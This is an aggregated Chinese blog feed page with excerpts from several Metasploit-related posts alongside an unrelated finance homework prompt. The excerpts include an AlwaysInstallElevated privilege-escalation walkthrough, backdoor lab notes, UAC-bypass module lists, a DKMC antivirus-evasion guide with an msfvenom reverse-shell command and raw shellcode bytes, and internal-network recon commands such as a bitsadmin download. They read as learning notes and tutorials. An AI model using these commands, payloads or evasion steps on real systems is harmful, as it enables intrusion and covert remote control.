msf

MSF 503 Financial Modeling

放肆的年华 提交于 2020-04-07 13:37:02
MSF 503 Financial Modeling Fall, 2019 PROJECT 2 1.) Recall LAB 2.1 that we did in class. This time assume the average inter-trade time (or scale) is equal to (say) 5 seconds. Write a Python program that finds the probability that the next trade will occur between 2 and 3 seconds. Recall that the cumulative distribution function (cdf) is F( x ) = P( X < x ). So, you will need to Google “python exponential distribution cdf”. If you are unfamiliar with Python, use trial and error to get the right answer for LAB 2.1 first. 2.) Suppose that a trading firm believes that a particular strategy will

利用 AlwaysInstallElevated 提权

一笑奈何 提交于 2020-04-04 17:45:19
注册表修改: 注册表查询: msf利用: 生成msi文件 获得一个meterpreter会话,上传msi文件 Upload /root/yang1.msi 另一窗口如下监听: 进入window执行msi文件 msiexec /quiet /qn /i yang1.msi /quiet=在安装期间禁止向用户发送任何消息 /qn=无GUI /i=常规(与管理)安装 另一窗口获得system权限 执行命令,增加用户(添加组同理) 如下生成 同理执行: 添加用户如下: msf自带模块利用: 来源: https://www.cnblogs.com/Yang34/p/12632568.html

Linux Basics for Hackers笔记

烈酒焚心 提交于 2020-03-21 07:51:28
书名是:《Linux Basics for Hackers(中文翻译稿)【(美)OccupyTheWeb 著】.pdf》  在不放链接了,关注“信安之路”公共号领取。 这本书才200页,我觉得适合没有基础的人花几天看一遍。毕竟鸟哥Linux太厚了·-· 我这不过是属于笔记,记了点看书的时候不怎么懂的东西,不全 查找文件: locate:1、遍历整个文件系统,显示内容。2、数据每天更新一次 whereis:查找二进制文件 which:查找PATH的二进制文件 find: find directory options expression find只显示确切的名称匹配但可以使用通配符 * . , ? [] nl:查看文件时显示行号 sed:替换 sed s/mysql/MYSQL/g /etc/snort/snort.conf > snort2.conf s 参数提供搜索,你先提供想要搜索的关键词 (mysql) 然后提供想要替换成的关键词 (MySQL), 用斜杠(/)分开。 g 参数告诉 Linux 你希望全局替换,然后将结果保存到一个新文件 snort2.conf。 iwconfig:获取无线网卡的信息 dhclient : dhclient eth0(-指定发送请求的网络端口 动态分配一个新的地址 更改硬件地址: kali >ifconfig eth0 down kali

2019-2020-2 网络对抗技术 20175217 Exp2 后门原理与实践

怎甘沉沦 提交于 2020-03-13 01:40:17
一、实验目标 清楚后门概念 会用nc获取远程主机的Shell 会用meterpreter 会启动后门 二、实验内容 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, 任务计划启动 使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell 使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权 可选加分内容:使用MSF生成shellcode,注入到实践1中的pwn1中,获取反弹连接Shell 三、基础问题回答 例举你能想到的一个后门进入到你系统中的可能方式? 当捡到一个U盘时,会尝试着插入自己的电脑,当U盘插入后后门可能进入系统 当下载一个软件时,后门可能同时被安装在你的系统中了 当你在网页上点击一个按钮时,后门可能会被安装在你的电脑里 例举你知道的后门如何启动起来(win及linux)的方式? 在开机的时候自启动(Windows注册表) 被设置了定时启动(Linux的crontab) 作为服务启动 被其他主机控制,从而启动 Meterpreter有哪些给你映像深刻的功能? 除了本次实验中完成的获取被控主机的录音、录像、截图、键盘输入记录等功能,还有从被控主机上对相关的文件进行下载和上传,远程操控目标机上的程序运行等功能。

msf之使用震网三代来提权

a 夏天 提交于 2020-03-08 00:01:33
cve_2017_8464_lnk_lpe,他就是震网三代的exploit 上次没有成功将x64的搞定,现在搬来了震网三代 看我来个远程执行漏洞的提权 前面已经拿到shell,但没有system权限 我也是稍微找了以下exploit,真是大海捞针 偶然发现 use exploit/windows/local/cve_2017_8464_lnk_lpe 设置好sessions,直接把权限提到system 可怕,视乎还删除了什么 [ ! ] Tried to delete C:\Users\hack\ruwkHlybgqtAAonb.dll, unknown result [ ! ] Tried to delete C:\Users\hack\gqSvmAVDKpXoSASr.lnk, unknown result 来源: CSDN 作者: 从小白到被迫变成大白 链接: https://blog.csdn.net/qq_44902875/article/details/104719282

msf之提权操作

可紊 提交于 2020-03-07 21:27:04
愿疫情早日结束,重返校园奋斗 使用getsystem来获得最高权限 getsystem 发现却爆出这样的错误 [ - ] priv_elevate_getsystem: Operation failed: The environment is incorrect. The following was attempted: [ - ] Named Pipe Impersonation ( In Memory/Admin ) [ - ] Named Pipe Impersonation ( Dropper/Admin ) [ - ] Token Duplication ( In Memory/Admin ) 提高程序运行级别(触发UAC) msf模块: use exploit/windows/local/ask info set session 1 show options 设置弹出内容 set filename WeChat.exe 看到,并点击是 弹出新的session 直接获得system权限 getsystem UAC绕过,无需点击 使用msf模块: exploit/windows/local/bypassuac exploit/windows/local/bypassuac_injection exploit/windows/local/bypassuac_vbs 使用第一个

免杀工具汇总

两盒软妹~` 提交于 2020-03-04 08:31:12
今天整理以前的笔记,把这部分工具整理了一下,虽然没有白利用稳,但这些工具也能在一定程度起到一定的免杀作用。 DKMC 项目地址: https://github.com/Mr-Un1k0d3r/DKMC 可以创建一个 outputs 文件夹 存放 shellcode 启动 python dkmc.py 操作顺序: Sc :是将 msf 生成的 raw 文件转换位 shellcode 代码 Gen :是将其 msf 的 shellcode 注入到 BMP 图片中 Ps :将其 BMP 的图片转换为 powershell 代码 Web :将其开启 web 功能 第一步,先生成原始的 shellcode msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.88.174 lport=7777 -e x86/shikata_ga_nai -i 16 -f raw -o /root/DKMC/dk 第二步,生成 shellcode ,将生成的 shellcode 保存到文本里,exit 退出 \xdb\xc3\xb8\xa4\x85\xc1\x7d\xd9\x74\x24\xf4\x5e\x31\xc9\xb1\xbb\x83\xee\xfc\x31\x46\x15\x03\x46\x15\x46\x70\x7f\xa8\x6b

MSF(四):常用弱点扫描模块

若如初见. 提交于 2020-02-28 10:34:41
常用弱点扫描模块 安全牛学习Metasploit Framework笔记 (1)VNC弱密码破解 use auxiliary/scanner/vnc/vnc_login (2)判断目标服务器VNC是否可以无密码访问 use auxiliary/scanner/vnc/vnc_none_auth 注意:若是无密码,则会显示:supported : None, free access! (3)RDP(远程桌面)漏洞 use auxiliary/scanner/rdp/ms12_020_check 该模块只会检查目标是否存在该漏洞,不会攻击,因此,不会造成DoS攻击 use auxiliary/dos/windows/rdp/ms12_020_maxchannelids 该模块使用dos认证目标是否存在该漏洞,因此会对目标系统使用拒绝服务攻击,如果漏洞存在,会致其蓝屏重启。建议:关键服务系统不建议使用 (4)设备后门(juniper防火墙+使用ssh登陆,即有可能存在该漏洞,fortiner同理)发现可以使用shodan use auxiliary/scanner/ssh/juniper_backdoor use auxiliary/scanner/ssh/fortinet_backdoor (5)VMWare ESXi密码爆破 use auxiliary/scanner/vmware

内网攻防经典技术备忘录

冷暖自知 提交于 2020-02-26 23:04:42
前言 很早就想专门写一篇关于内网的文章,一直没有腾出空来,万万没想到,写下这篇文章的时候,竟然是我来某实验室实习的时间段:) 信息搜集 nmap扫描实时存活的ip nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips 常用命令 ipsping icmp连通性 nslookup www.baidu.com vps-ip dns连通性 dig @vps-ip www.baidu.com curl vps:8080 http连通性 tracert bitsadmin /transfer n http://ip/xx.exe C:\windows\temp\x.exe一种上传文件 >=2008 fuser -nv tcp 80 查看端口pid rdesktop -u username ip linux连接win远程桌面 (有可能不成功) where file win查找文件是否存在 找路径,Linux下使用命令find -name *.jsp来查找,Windows下,使用for /r c:\windows\temp\ %i in (file lsss.dmp) do @echo %i netstat -apn | grep

MSF(六):后渗透

三世轮回 提交于 2020-02-26 07:32:01
后渗透测试 安全牛学习Metasploit Framework笔记 一、已经获得目标系统控制权后扩大战果 (1)提权 (2)信息收集 (3)渗透内网 (4)永久后门 二、基于已有session扩大战果 - msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=4444 - b "\x00" -e x86/shikata_ga_nai -f exe -o 1.exe - use /exploit/mutli/reverse_tcp - set payload windows/meterpreter/reverse_tcp - exploit - 只要目标系统执行1.exe,我们即可获得反弹shell 三、获取system账号权限 (1)提权可以使用getsystem,如果没有该命令 (2)使用load priv,加载包含getsystem的priv插件(priv表示提权) (3)如果getsystem获取不到权限,基本是被UAC限制了 四、绕过UAC限制 (1)基于session获取system - use exploit/windows/local/ask - set session - set filename - set payload windows